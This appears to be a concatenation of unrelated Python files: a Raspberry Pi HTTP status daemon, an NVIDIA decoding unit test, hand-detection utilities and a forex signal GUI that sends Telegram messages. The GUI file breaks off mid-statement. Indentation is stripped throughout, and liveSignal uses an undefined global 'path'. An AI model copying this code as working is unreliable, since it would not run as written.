while not timer.expired():
if all(self._status_updated.values()):
return
time.sleep(sleep)
raise error.Timeout("Timeout while waiting for dome shutter status.")
def _wait_for_true(self, property_name, sleep=1):
""" Wait for a property to evaluate to True. """
timer = CountdownTimer(self._shutter_timeout)
while not timer.expired():
if getattr(self, property_name):
return
time.sleep(sleep)
raise error.Timeout(f"Timeout while waiting for dome shutter property: {property_name}.")
|
daemonhttp.py
|
#
# Imports
#
import configparser
import json
import logging
import raspberrypi
import threading
import time
import signal
from http.server import HTTPServer, SimpleHTTPRequestHandler
from http import HTTPStatus
from urllib.parse import urlparse, parse_qs
class Config:
def __init__(self, filename, default=None):
self.filename = filename
# Avoid sharing a mutable default dict between Config instances.
self.default = default if default is not None else {}
self.config = configparser.ConfigParser()
def load(self):
self.config.read(self.filename)
if 'DEFAULT' not in self.config:
self.config['DEFAULT'] = {}
def save(self):
with open(self.filename, 'w') as configfile:
self.config.write(configfile)
def getint(self, key):
if self.config.has_option('DEFAULT', key):
return self.config.getint('DEFAULT', key)
else:
return int(self.default[key])
def getboolean(self, key):
if self.config.has_option('DEFAULT', key):
return self.config.getboolean('DEFAULT', key)
else:
return self.default[key].lower() in ['true', '1', 't', 'y', 'yes', 'on']
def __getitem__(self, key):
if key in self.config['DEFAULT']:
return self.config['DEFAULT'][key]
else:
return self.default[key]
def __setitem__(self, key, value):
self.config['DEFAULT'][key] = str(value)
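# Usage sketch (filename and keys are hypothetical):
#   config = Config('daemon.ini', default={'server_port': '8080', 'recalc_interval': '5'})
#   config.load()
#   port = config.getint('server_port')   # falls back to the default if absent from the file
#   config['recalc_interval'] = 10        # stored as a string in the DEFAULT section
#   config.save()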
class DaemonHTTPHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if DaemonHTTPHandler._is_resource_access(self.path):
SimpleHTTPRequestHandler.do_GET(self)
elif DaemonHTTPHandler._is_api_request(self.path):
self._handle_api()
else:
logging.error("Invalid resource access %s", self.path)
self.send_error(404, "Resource not found")
def log_message(self, format, *args):
logging.info("%s %s", self.address_string(), format % args)
def log_error(self, format, *args):
logging.error("%s %s", self.address_string(), format % args)
def translate_path(self, path):
if path.startswith('/resources'):
return super().translate_path(path)
else:
return super().translate_path("/resources" + path)
def _handle_api(self):
# Parse URL
parsed_url = urlparse(self.path)
api = parsed_url.path[len("/api/"):].lower()
query_params = parse_qs(parsed_url.query)
# Retrieve API Data
data = self.server.daemon.handle_api(api, query_params, None)
# If API data is valid then send it
if data:
encoded_data = bytes(data, "UTF-8")
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "application/json")
self.send_header("Content-Length", len(encoded_data))
self.end_headers()
self.wfile.write(encoded_data)
else:
logging.error("Invalid API call. API: %s", api)
self.send_error(500, "Not implemented")
@staticmethod
def _is_api_request(path: str) -> bool:
if path.startswith("/api") and len(path) > len("/api/"):
return True
else:
return False
@staticmethod
def _is_resource_access(path: str) -> bool:
if path.startswith("/resources"):
return True
if path == "/index.html" or path == "/":
return True
return False
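# Illustrative behaviour of the two request classifiers (paths are examples only):
#   _is_api_request("/api/hardware")     -> True
#   _is_api_request("/api/")             -> False  (nothing after the prefix)
#   _is_resource_access("/index.html")   -> True
#   _is_resource_access("/api/hardware") -> False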
class Daemon:
def __init__(self, config: Config) -> None:
self.config = config
self.config.load()
self.recalc_interval = float(self.config['recalc_interval'])
self.http_server = HTTPServer(('', self.config.getint('server_port')), DaemonHTTPHandler)
self.http_server.daemon = self
self.http_server_thread = threading.Thread(target=self.http_server.serve_forever)
self.running = False
def handle_api(self, api, query, post) -> str:
logging.info("API Request handling. API:%s QUERY:%s POST:%s", api, query, post)
param = {}
if query:
param.update(query)
if post:
param.update(post)
result = self.api(api, param)
return json.dumps(result)
def api(self, api, params):
result = {}
if api == "hardware":
result['temperature'] = raspberrypi.get_temperature()
result['voltage'] = raspberrypi.get_voltage()
result['frequency'] = raspberrypi.get_frequency()
result['memory'] = raspberrypi.get_totalmemory()
result['free'] = raspberrypi.get_freememory()
result['uptime'] = raspberrypi.get_uptime()
result['loadavg'] = raspberrypi.get_loadavg()
else:
return None
return result
def run(self):
self.running = True
signal.signal(signal.SIGINT, self._stop_loop)
signal.signal(signal.SIGTERM, self._stop_loop)
try:
logging.info("Starting server at %s...", "%s:%s" % self.http_server.server_address)
self.http_server_thread.start()
while self.running:
logging.debug("Recalculating...")
self.recalculate()
logging.debug("... finished recalculating")
time.sleep(self.recalc_interval)
except KeyboardInterrupt:
self.running = False
logging.info("Shutting down server...")
self.http_server.shutdown()
self.http_server_thread.join()
logging.info("bye!")
def recalculate(self):
pass
def _stop_loop(self, signum, frame):
logging.info("Received kill signal")
self.running = False
|
decoding_unit_test.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import argparse
import os
import copy
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import sys
import time
sys.path.append("./tensorflow")
from translate_sample import translate_sample
from multiprocessing import Process, Value
class TestDecoding(unittest.TestCase):
common_args_dict = {'batch_size' : 128,
'max_seq_len': 128,
'encoder_head_number': 8,
'encoder_size_per_head': 64,
'decoder_head_number': 8,
'decoder_size_per_head': 64,
'encoder_num_layer': 6,
'decoder_num_layer': 6,
'beam_search_diversity_rate': 0.0,
'sampling_topk': 1,
'sampling_topp': 0.0,
'source_vocabulary': "./tensorflow/utils/translation/wmtende.vocab",
'target_vocabulary': "./tensorflow/utils/translation/wmtende.vocab",
'source': "./tensorflow/utils/translation/test.en",
'target': "./tensorflow/utils/translation/test.de",
"remove_padding": "True"
}
def check_result(self, beam_width, datatype, test_time, topk=4, topp=0.0, batch_size=-1):
result = Value('i', -1)
p = Process(target=self.run_translate, args=(beam_width, datatype, test_time, topk, topp, batch_size, result))
p.start()
p.join()
self.assertTrue(result.value == 1)
def run_translate(self, beam_width, datatype, test_time, topk=4, topp=0.0, batch_size=-1, result=None):
args_dict = copy.deepcopy(self.common_args_dict)
args_dict['beam_width'] = beam_width
args_dict['data_type'] = datatype
args_dict['test_time'] = test_time
args_dict['sampling_topk'] = topk
args_dict['sampling_topp'] = topp
if batch_size != -1:
args_dict['batch_size'] = batch_size
tf.reset_default_graph()
translation_result_list = translate_sample(args_dict)
tf_bleu_score = translation_result_list[0].bleu_score.score
op_decoder_bleu_score = translation_result_list[1].bleu_score.score
op_decoding_bleu_score = translation_result_list[2].bleu_score.score
sys.stdout.flush()
if op_decoder_bleu_score >= tf_bleu_score - 1.0 and op_decoding_bleu_score >= tf_bleu_score - 1.0:
result.value = 1
else:
result.value = 0
def test_decoding_beamsearch_fp32(self):
os.system("./bin/decoding_gemm 32 4 8 64 32001 128 512 0")
self.check_result(4, 'fp32', '012', batch_size=32)
def test_decoding_beamsearch_fp16(self):
os.system("./bin/decoding_gemm 32 4 8 64 32001 128 512 1")
self.check_result(4, 'fp16', '012', batch_size=32)
def test_decoding_beamsearch_fp32_2(self):
os.system("./bin/decoding_gemm 16 32 8 64 32001 128 512 0")
self.check_result(32, 'fp32', '012', batch_size=16)
def test_decoding_beamsearch_fp16_2(self):
os.system("./bin/decoding_gemm 16 32 8 64 32001 128 512 1")
self.check_result(32, 'fp16', '012', batch_size=16)
def test_decoding_topk_sampling_fp32(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 4, 0.0)
def test_decoding_topk_sampling_fp16(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 4, 0.0)
def test_decoding_topk_sampling_fp32_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 64, 0.0)
def test_decoding_topk_sampling_fp16_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 64, 0.0)
def test_decoding_topp_sampling_fp32(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 0, 0.5)
def test_decoding_topp_sampling_fp16(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 0, 0.5)
def test_decoding_topp_sampling_fp32_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 0")
self.check_result(1, 'fp32', '345', 0, 0.9)
def test_decoding_topp_sampling_fp16_2(self):
os.system("./bin/decoding_gemm 128 1 8 64 32001 128 512 1")
self.check_result(1, 'fp16', '345', 0, 0.9)
if __name__ == "__main__":
unittest.main()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that are used to add the correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
# TODO allow for the score to be used here
def draw_tracked_box_on_image(tracks, im_width, im_height, image_np, score_thresh=0.2):
for i, track in enumerate(tracks):
if (track[5] > score_thresh):
(left, right, top, bottom) = (track[1] * im_width, track[3] * im_width,
track[0] * im_height, track[2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
cv2.putText(image_np, str(track[4]) + ': ' + str(track[5]),
(int(track[1] * im_width), int(track[2] * im_height + 10)),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
cv2.putText(image_np, str(scores[i]), (int(boxes[i][1] * im_width), int(boxes[i][2] * im_height- 10)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
    # Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
    # Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
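
# Minimal usage sketch (assumption: a webcam at index 0 is available and the frozen graph
# referenced above exists); kept behind a main guard so importing this module stays side-effect free.
if __name__ == '__main__':
    detection_graph, sess = load_inference_graph()
    video = WebcamVideoStream(src=0, width=320, height=180).start()
    im_width, im_height = video.size()
    while True:
        # convert the BGR frame OpenCV captures to RGB before detection
        frame = cv2.cvtColor(video.read(), cv2.COLOR_BGR2RGB)
        boxes, scores = detect_objects(frame, detection_graph, sess)
        # draw at most two hands that clear the score threshold
        draw_box_on_image(2, _score_thresh, scores, boxes, im_width, im_height, frame)
        cv2.imshow('Hand detection', cv2.cvtColor(frame, cv2.COLOR_RGB2BGR))
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    video.stop()
    cv2.destroyAllWindows()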
|
automated_gui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 25 02:21:40 2019
@author: kenneth
"""
import time
from STOCK import stock
import os
import requests
import numpy as np
import pandas as pd
import tkinter as tk
from tkinter import ttk
from oandapyV20 import API
from mpl_finance import candlestick2_ohlc
from oandapyV20.endpoints.pricing import PricingStream
from threading import Thread
from queue import Queue
from Automated_Signal_generator import (signalStrategy, Signal,
Run)
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
#%%
#stream live quotes
class streamer(ttk.Frame):
def __init__(self, master = None, path = None):
ttk.Frame.__init__(self, master)
# self.master = master
self.path = path
self.run()
def stream(self):
try:
rowDisplaced = 4
data = pd.read_csv(os.path.join(self.path['mainPath'], "TICKERS/streams.csv")).iloc[:, 1:]
data.sort_values(['tickers'], inplace = True)
            for enum, (index, row) in enumerate(data.iterrows()):
                if row['direction'] not in ('^', 'v'):
                    continue
                # green background for an up-tick, red for a down-tick
                colour = "#42f55a" if row['direction'] == '^' else "#f54242"
                #--tickers
                label = tk.Button(self, width = 9, height = 2, text = row['tickers'])
                label.configure(text= "{}".format(row['tickers']))
                label.grid(row = enum+rowDisplaced, column =0)
                #--bids
                label2 = tk.Button(self, width = 9, height = 2, text = round(row['bids'], 5), bg= colour)
                label2.configure(text= "{}".format(round(row['bids'], 5)))
                label2.grid(row = enum+rowDisplaced, column =1)
                #--asks
                label3 = tk.Button(self, width = 9, height = 2, text = round(row['asks'], 5), bg= colour)
                label3.configure(text= "{}".format(round(row['asks'], 5)))
                label3.grid(row = enum+rowDisplaced, column =2)
                #--direction
                label4 = tk.Button(self, width = 9, height = 2, text = row['direction'], bg= colour)
                label4.configure(text= "{}".format(row['direction']))
                label4.grid(row = enum+rowDisplaced, column =3)
except:
pass
def run(self):
try:
self.stream()
self.after(1000, self.run)
except:
pass
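# Design note: streamer only re-reads the TICKERS/streams.csv file that Quote.quoteStreamer
# (defined below) keeps rewriting; polling it once per second with Tk's after() keeps the
# GUI responsive instead of blocking on the pricing stream itself.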
#--telegram bot
class telegramBot(object):
def __init__(self, path):
self.path = path
return
def flag(self, code):
OFFSET = 127462 - ord('A')
code = code.upper()
return chr(ord(code[0]) + OFFSET) + chr(ord(code[1]) + OFFSET)
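    # flag() maps a two-letter country code onto Unicode regional-indicator symbols
    # ('A'..'Z' -> U+1F1E6..U+1F1FF), e.g. flag('us') -> chr(0x1F1FA) + chr(0x1F1F8) = 🇺🇸.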
def tgsignal(self, signal):
import telegram
with open(os.path.join(self.path['mainPath'], self.path['telegram'])) as tgt:
token, chatID= tgt.readlines()
token = token.strip()
chatID = chatID.strip()
bot = telegram.Bot(token = token)
text = '<b> ✅✅✅✅ AI SIGNAL GENERATOR ✅✅✅✅ </b>\n\n'
flags = {'AUD_USD': (self.flag('au'), self.flag('us')),
'BCO_USD': (self.flag('gb'), self.flag('us')),
'BTC_USD': (self.flag('us'), self.flag('us')),
'DE30_EUR': (self.flag('de'), self.flag('eu')),
'EUR_AUD': (self.flag('eu'), self.flag('au')),
'EUR_JPY': (self.flag('eu'), self.flag('jp')),
'EUR_USD': (self.flag('eu'), self.flag('us')),
'GBP_JPY': (self.flag('gb'), self.flag('jp')),
'GBP_USD': (self.flag('gb'), self.flag('us')),
'NAS100_USD': (self.flag('us'), self.flag('us')),
'SPX500_USD': (self.flag('us'), self.flag('us')),
'US30_USD': (self.flag('us'), self.flag('us')),
'USD_CAD': (self.flag('us'), self.flag('ca')),
'USD_JPY': (self.flag('us'), self.flag('jp')),
'XAU_USD': (self.flag('us'), self.flag('us'))}
for index, sig in signal.iterrows():
if sig['position'] == 'BUY':
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: 🔵{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ 🔺{sig['close']}</i>\n\
<i>TP1: {sig['tp1']}</i>\n\
<i>TP2: {sig['tp2']}</i>\n\
<i>TP3: {sig['tp3']}</i>\n\
<i>SL: {sig['sl']}</i>\n"
elif sig['position'] == 'SELL':
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: 🔴{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ 🔻{sig['close']}</i>\n\
<i>TP1: {sig['tp1']}</i>\n\
<i>TP2: {sig['tp2']}</i>\n\
<i>TP3: {sig['tp3']}</i>\n\
<i>SL: {sig['sl']}</i>\n"
else:
for ii, ij in flags.items():
if sig['pair'] == ii:
text += f"<b> {ij[0]}{sig['pair']}{ij[1]}</b>\n\
<i>POSITION: ⚫️{sig['position']}</i>\n\
<i>TIME: 🕖 {sig['time']}</i>\n\
<i>@ {sig['close']}</i>\n"
return bot.send_message(chat_id=chatID,
text=text,
parse_mode=telegram.ParseMode.HTML)
#stream and autoupdate signal
class streamSignal(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.frameSettings = ttk.Frame(self, relief=tk.RAISED, borderwidth=1)
frameGB = ttk.Frame(self.frameSettings)
style = ttk.Style()
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
strategy = tk.Label(frameGB, text = 'Strategy').grid(row = 1, column = 0)
self.strategyEntry = ttk.Combobox(frameGB, values = self.path['strategy'], state = 'readonly', width = 8)
self.strategyEntry.current(32)
self.strategyEntry.focus()
self.strategyEntry.bind("<<ComboboxSelected>>", self.callback)
'''Edit Strategy here'''
self.strategyEntry.grid(row = 1, column = 1, padx = 10, pady = 5)
deviation = tk.Label(frameGB, text = 'Deviation').grid(row = 2, column = 0, padx = 10, pady = 5)
self.deviationEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.deviationEntry.insert(tk.END, 2)
self.deviationEntry.grid(row = 2, column = 1, padx = 10, pady = 5)
multiplier = tk.Label(frameGB, text = 'Multiplier').grid(row = 3, column = 0, padx = 10, pady = 5)
self.multiplierEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.multiplierEntry.insert(tk.END, 2)
self.multiplierEntry.grid(row = 3, column = 1, padx = 10, pady = 5)
period = tk.Label(frameGB, text = 'Period').grid(row = 4, column = 0, padx = 10, pady = 5)
self.periodEntry = tk.Entry(frameGB, width = 10, fg = 'white', bg = '#e3104f')
self.periodEntry.insert(tk.END, 20)
self.periodEntry.grid(row = 4, column = 1, padx = 10, pady = 5)
frameGB.grid(row = 1, column = 0, padx = 10, pady = 10)
#--ATR and RSI
frameRSI = ttk.Frame(self.frameSettings)
period_atr = tk.Label(frameRSI, text = 'Period ATR').grid(row = 1, column = 1, padx = 10, pady = 5)
self.period_atrEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_atrEntry.insert(tk.END, 14)
self.period_atrEntry.grid(row = 1, column = 2, padx = 10, pady = 5)
period_alpha = tk.Label(frameRSI, text = 'Period alpha').grid(row = 2, column = 1, padx = 10, pady = 5)
self.period_alphaE = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_alphaE.insert(tk.END, 10)
self.period_alphaE.grid(row = 2, column = 2, padx = 10, pady = 5)
period_beta = tk.Label(frameRSI, text = 'Period beta').grid(row = 3, column = 1, padx = 10, pady = 5)
self.period_betaE = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.period_betaE.insert(tk.END, 20)
self.period_betaE.grid(row = 3, column = 2, padx = 10, pady = 5)
frameRSI.grid(row = 1, column = 1, padx = 10, pady = 10)
frameMACD = ttk.Frame(self.frameSettings)
fast = tk.Label(frameMACD, text = 'Fast').grid(row = 1, column = 2, padx = 10, pady = 5)
self.fastEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.fastEntry.insert(tk.END, 12)
self.fastEntry.grid(row = 1, column = 3, padx = 10, pady = 5)
slow = tk.Label(frameMACD, text = 'Slow').grid(row = 2, column = 2, padx = 10, pady = 5)
self.slowEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.slowEntry.insert(tk.END, 26)
self.slowEntry.grid(row = 2, column = 3, padx = 10, pady = 5)
signal = tk.Label(frameMACD, text = 'Signal').grid(row = 3, column = 2, padx = 10, pady = 5)
self.signalEntry = tk.Entry(frameMACD, width = 10, fg = 'white', bg = '#e3104f')
self.signalEntry.insert(tk.END, 9)
self.signalEntry.grid(row = 3, column = 3, padx = 10, pady = 5)
frameMACD.grid(row = 1, column = 2, padx = 10, pady = 10)
frameRSI = ttk.Frame(self.frameSettings)
LB = tk.Label(frameRSI, text = 'Lower bound').grid(row = 1, column = 3, padx = 10, pady = 5)
self.LBEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.LBEntry.insert(tk.END, 30)
self.LBEntry.grid(row = 1, column = 4, padx = 10, pady = 5)
UB = tk.Label(frameRSI, text = 'Higher bound').grid(row = 2, column = 3, padx = 10, pady = 5)
self.UBEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.UBEntry.insert(tk.END, 70)
self.UBEntry.grid(row = 2, column = 4, padx = 10, pady = 5)
Midline = tk.Label(frameRSI, text = 'Midline').grid(row = 3, column = 3, padx = 10, pady = 5)
self.MidlineEntry = tk.Entry(frameRSI, width = 10, fg = 'white', bg = '#e3104f')
self.MidlineEntry.insert(tk.END, 0)
self.MidlineEntry.grid(row = 3, column = 4, padx = 10, pady = 5)
frameRSI.grid(row = 1, column = 4, padx = 10, pady = 10)
frameTF = ttk.Frame(self.frameSettings)
timeframe = tk.Label(frameTF, text = 'TimeFrame').grid(row = 1, column = 4)
self.timeframeEntry = ttk.Combobox(frameTF, values = self.path['timeframes'], width = 8)
self.timeframeEntry['state'] = 'readonly'
self.timeframeEntry.current(2)
self.timeframeEntry.grid(row = 1, column = 5, padx = 10, pady = 5)
self.timeframeEntry.bind("<<ComboboxSelected>>", self.callback)
time = tk.Label(frameTF, text = 'Timer').grid(row = 2, column = 4, padx = 10, pady = 5)
self.timeEntry = ttk.Combobox(frameTF, values = self.path['timeframes'], width = 8)
self.timeEntry['state'] = 'readonly'
self.timeEntry.current(1)
self.timeEntry.grid(row = 2, column = 5, padx = 10, pady = 5)
self.timeEntry.bind("<<ComboboxSelected>>", self.callback)
frameTF.grid(row = 1, column = 5, padx = 10, pady = 10)
#setting frame
self.frameSettings.grid(row = 0, column = 0)
        # remember the currently selected timeframe (the Label's grid() call above returns None)
        self.timeframe = str(self.timeframeEntry.get())
return self.runSignal()
#--callback
def callback(self, eventObject):
return eventObject.widget.get()
def liveSignal(self):
'''Docstring
:params: None
:Returntype: a list of last signal positions
'''
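        # Take-profit / stop-loss rule used below: for a BUY at close C with ATR a,
        # tp1 = C + 6a, tp2 = C + 10a, tp3 = C + 15a, sl = C - 2a (mirrored for a SELL).
        # Worked example: C = 1.1200, a = 0.0010 -> tp1 = 1.1260, tp2 = 1.1300,
        # tp3 = 1.1350, sl = 1.1180 (5-decimal rounding for single-digit quotes, 2 otherwise).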
self.pairs = self.path['instruments'].split(',')
openPositions = []
for st in self.pairs:
data = pd.read_csv(os.path.join(self.path['mainPath'], f"{self.path['predicted']}/STRATEGY_{self.strategyEntry.get()}/{self.timeframe}/{st}"+".csv"))
stockData = stock(data)
data['ATR'] = stockData.ATR(data, int(self.periodEntry.get()))
position = data.Position[0]
time = data.timestamp[0]
close = data.Close[0]
atrVal = data.ATR[0]
for day, pos, cl, atr in zip(data.timestamp.values, data.Position.values, data.Close.values, data.ATR.values):
if position == pos:
pass
else:
position = pos
time = day
close = cl
atrVal = atr
if position == 'BUY':
if len(str(close).split('.')[0]) > 1:
tp1 = round(abs(close + 6*atrVal), 2)
tp2 = round(abs(close + 10*atrVal), 2)
tp3 = round(abs(close + 15*atrVal), 2)
sl = round(abs(close - 2*atrVal), 2)
else:
tp1 = round(abs(close + 6*atrVal), 5)
tp2 = round(abs(close + 10*atrVal), 5)
tp3 = round(abs(close + 15*atrVal), 5)
sl = round(abs(close - 2*atrVal), 5)
elif position == 'SELL':
if len(str(close).split('.')[0]) > 1:
tp1 = round(abs(close - 6*atrVal), 2)
tp2 = round(abs(close - 10*atrVal), 2)
tp3 = round(abs(close - 15*atrVal), 2)
sl = round(abs(close + 2*atrVal), 2)
else:
tp1 = round(abs(close - 6*atrVal), 5)
tp2 = round(abs(close - 10*atrVal), 5)
tp3 = round(abs(close - 15*atrVal), 5)
sl = round(abs(close + 2*atrVal), 5)
else:
if len(str(close).split('.')[0]) > 1:
tp1 = round(close, 2)
tp2 = round(close, 2)
tp3 = round(close, 2)
sl = round(close, 2)
else:
tp1 = round(close, 5)
tp2 = round(close, 5)
tp3 = round(close, 5)
sl = round(close, 5)
#append result: Store in database & pass to GUI
openPositions.append([st, position, time, close, tp1, tp2, tp3, sl])
columns = ['pair', 'position', 'time', 'close', 'tp1', 'tp2', 'tp3', 'sl']
if not os.path.exists(os.path.join(path['mainPath'], path['signals']+'/signals.csv')):
signal = pd.DataFrame(openPositions, columns = columns)
signal.to_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv'))
#--Return telegram
telegramBot(self.path).tgsignal(signal)
else:
oldSignal = pd.read_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv')).iloc[:, 1:]
newSignal = pd.DataFrame(openPositions, columns = columns)
if oldSignal['position'].equals(newSignal['position']):
pass
else:
newSignal['update'] = np.where(oldSignal['position'] == newSignal['position'], np.nan, newSignal.position)
updateSignal = newSignal.dropna().drop(['update'], axis = 1)
newSignal.drop(['update'], axis = 1, inplace = True)
newSignal.to_csv(os.path.join(path['mainPath'], path['signals']+'/signals.csv'))
#--Return telegram
telegramBot(self.path).tgsignal(updateSignal)
return openPositions
def signalGUI(self):
#Run automated signal
self.strategy = str(self.strategyEntry.get())
self.pairs = self.path['instruments'].split(',')
self.dev = int(self.deviationEntry.get())
self.mul = int(self.multiplierEntry.get())
self.period = int(self.periodEntry.get())
self.lwbound = int(self.LBEntry.get())
self.upbound = int(self.UBEntry.get())
self.midline = int(self.MidlineEntry.get())
self.fast = int(self.fastEntry.get())
self.slow = int(self.slowEntry.get())
self.signal = int(self.signalEntry.get())
self.timeframe = str(self.timeframeEntry.get())
self.palpha = int(self.period_alphaE.get())
self.pbeta = int(self.period_betaE.get())
self.periodatr = int(self.period_atrEntry.get())
#--Run signal
Run(path = self.path, strategy = self.strategy, STOCKLIST = self.pairs, DEVIATION = self.dev, MULTIPLIER = self.mul, PERIOD = self.period, LOWER_BOUND = self.lwbound,\
UPPER_BOUND = self.upbound, MIDLINE = self.midline, FAST = self.fast, SLOW = self.slow, SIGNAL = self.signal, TIMEFRAME = self.timeframe,\
PERIOD_ALPHA = self.palpha, PERIOD_BETA = self.pbeta, PERIODATR = self.periodatr)
#throw signal
self.Sigframe = ttk.Frame(self)
openPositions = self.liveSignal()
#--return GUI
rowDisplaced = 6
for enum, signal in enumerate(openPositions):
if signal[1] == 'BUY':
#--buy/sell/EXIT
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
